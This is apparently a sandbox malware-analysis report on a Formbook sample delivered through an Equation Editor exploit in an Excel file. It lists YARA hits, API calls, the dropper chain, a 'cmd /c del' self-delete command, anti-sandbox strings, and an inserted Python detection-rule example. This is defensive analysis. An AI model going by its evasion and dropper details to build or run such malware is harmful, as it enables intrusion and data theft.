        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004181B0 NtCreateFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418260 NtReadFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004182E0 NtClose,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00418390 NtAllocateVirtualMemory,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004181B4 NtCreateFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041825B NtReadFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_004182DA NtClose,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A400C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40078 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A407AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A410D0 NtOpenProcessToken,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40060 NtQuerySection,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A401D4 NtSetValueKey,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A4010C NtOpenDirectoryObject,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A41148 NtOpenThread,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F8CC NtWaitForSingleObject,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A41930 NtSetContextThread,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3F938 NtWriteFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FAB8 NtQueryValueKey,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FA20 NtQueryInformationFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FA50 NtEnumerateValueKey,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FBE8 NtQueryVirtualMemory,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FB50 NtCreateKey,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC30 NtOpenProcess,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A40C40 NtGetContextThread,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FC48 NtSetInformationFile,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A41D80 NtSuspendThread,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FD5C NtEnumerateKey,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FE24 NtWriteVirtualMemory,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FFFC NtCreateProcessEx,
        Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3FF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE00C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE07AC NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF9F0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF900 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFB50 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFAB8 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFFB4 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE01D4 NtSetValueKey,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE1148 NtOpenThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE010C NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE10D0 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0060 NtQuerySection,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0078 NtResumeThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0048 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF938 NtWriteFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE1930 NtSetContextThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDF8CC NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFBE8 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFA20 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE1D80 NtSuspendThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFD5C NtEnumerateKey,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC90 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC48 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EE0C40 NtGetContextThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFC30 NtOpenProcess,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFFFC NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFEA0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_01EDFE24 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000981B0 NtCreateFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_00098260 NtReadFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000982E0 NtClose,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_00098390 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000981B4 NtCreateFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0009825B NtReadFile,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_000982DA NtClose,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0226632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_022667C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_02266332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
        Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_022667C2 NtQueryInformationProcess,
        Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
        Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
        Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
        Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exe | Memory allocated: 76F90000 page execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exe | Memory allocated: 76E90000 page execute and read and write
        Source: vbc[1].exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: vbc.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: (RFQ) No.109050.xlsx | ReversingLabs: Detection: 34%
        Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
        Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE15.tmp
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/19@5/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
        Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
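The process creations listed above (EQNEDT32.EXE spawning C:\Users\Public\vbc.exe, vbc.exe re-launching itself, explorer.exe starting raserver.exe, and raserver.exe running cmd.exe /c del on the dropper) are the chain the Sigma rules "Droppers Exploiting CVE-2017-11882" and "Execution from Suspicious Folder" match on. The following is an added example, not Joe Sandbox's own tooling: it evaluates four such rules over constructed Sysmon-style process-creation events that reproduce this report's chain. The Sysmon field names are real; the directory list, the rule names and the double-quoted form of the del command line are assumptions made for the example.

```python
"""Process-creation rules for the infection chain this report records.

Added example, not Joe Sandbox code. SAMPLE_EVENTS are constructed
Sysmon Event ID 1 style records reproducing the "Process created" lines
of the report. The directory list, rule names and the quoting of the
del command line are assumptions.
"""
import ntpath
import re

# Constructed events modelled on the report's "Process created" lines.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Users\Public\vbc.exe",
     "CommandLine": r'"C:\Users\Public\vbc.exe"'},
    {"ParentImage": r"C:\Users\Public\vbc.exe",
     "Image": r"C:\Users\Public\vbc.exe",
     "CommandLine": r"C:\Users\Public\vbc.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\SysWOW64\raserver.exe",
     "CommandLine": r"C:\Windows\SysWOW64\raserver.exe"},
    {"ParentImage": r"C:\Windows\SysWOW64\raserver.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd.exe /c del "C:\Users\Public\vbc.exe"'},  # quoting assumed
]

# World-writable locations a freshly dropped EXE tends to run from
# (the dropper here sits in C:\Users\Public). Assumed list; paths are
# compared with forward slashes so the tuple needs no trailing backslash.
SUSPICIOUS_DIRS = ("c:/users/public/", "/appdata/local/temp/",
                   "c:/programdata/", "c:/windows/temp/")

# Office helper binaries that have no legitimate reason to spawn children.
OFFICE_HELPERS = {"eqnedt32.exe"}


def _name(path):
    return ntpath.basename(path).lower()


def _unquote(cmd):
    return cmd.replace('"', "").replace("'", "").lower()


def evaluate(events):
    """Return sorted (rule, image) findings for a stream of process-creation events."""
    findings = set()
    seen = []  # images created so far, consulted by the self-delete rule
    for ev in events:
        image, parent = ev["Image"], ev["ParentImage"]
        cmd = ev.get("CommandLine", "")
        low = image.lower().replace("\\", "/")
        # Sigma "Droppers Exploiting CVE-2017-11882": any child of the Equation Editor.
        if _name(parent) in OFFICE_HELPERS:
            findings.add(("office_equation_editor_spawn", image))
        # Sigma "Execution from Suspicious Folder".
        if low.endswith(".exe") and any(d in low for d in SUSPICIOUS_DIRS):
            findings.add(("exec_from_suspicious_folder", image))
        # A binary launching an identical copy of itself (unpacker stage -> payload stage).
        if image.lower() == parent.lower():
            findings.add(("self_respawn", image))
        # cmd.exe deleting the image of a process created earlier in the same tree.
        if _name(image) == "cmd.exe" and re.search(r"\bdel\b", cmd, re.IGNORECASE):
            for earlier in seen:
                if earlier.lower() in _unquote(cmd):
                    findings.add(("dropper_self_delete", earlier))
        seen.append(image)
    return sorted(findings)


if __name__ == "__main__":
    for rule, image in evaluate(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
```

All four rules fire on C:\Users\Public\vbc.exe and none on EXCEL.EXE. The explorer.exe to raserver.exe step is deliberately not a rule: Explorer launching a Windows binary is routine on its own, and the report attributes it to code injected into explorer.exe, which process-creation telemetry alone cannot show; that step needs the thread-injection evidence recorded later in this report.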

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: vbc[1].exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: vbc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D950F push edi; iretd
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004070F2 push CB9B4C56h; iretd
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004158FC pushfd ; retf
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3F2 push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3FB push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3A5 push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B45C push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00415436 pushad ; retf
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00415CBF push ds; iretd
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4DFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEDFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000958FC pushfd ; retf
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000870F2 push CB9B4C56h; iretd
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3A5 push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3FB push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3F2 push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00095436 pushad ; retf
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B45C push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00095CBF push ds; iretd
        Source: vbc[1].exe.4.dr Static PE information: link timestamp 0x9EDDC985 [Wed Jun 17 18:52:53 2054 UTC] (a future date, so the compile time is not genuine)
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15286878392
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15286878392
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (10 events)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 events)
        Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (21 events)
        Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Yara detected AntiVM3
        Source: Yara matchFile source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2028, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
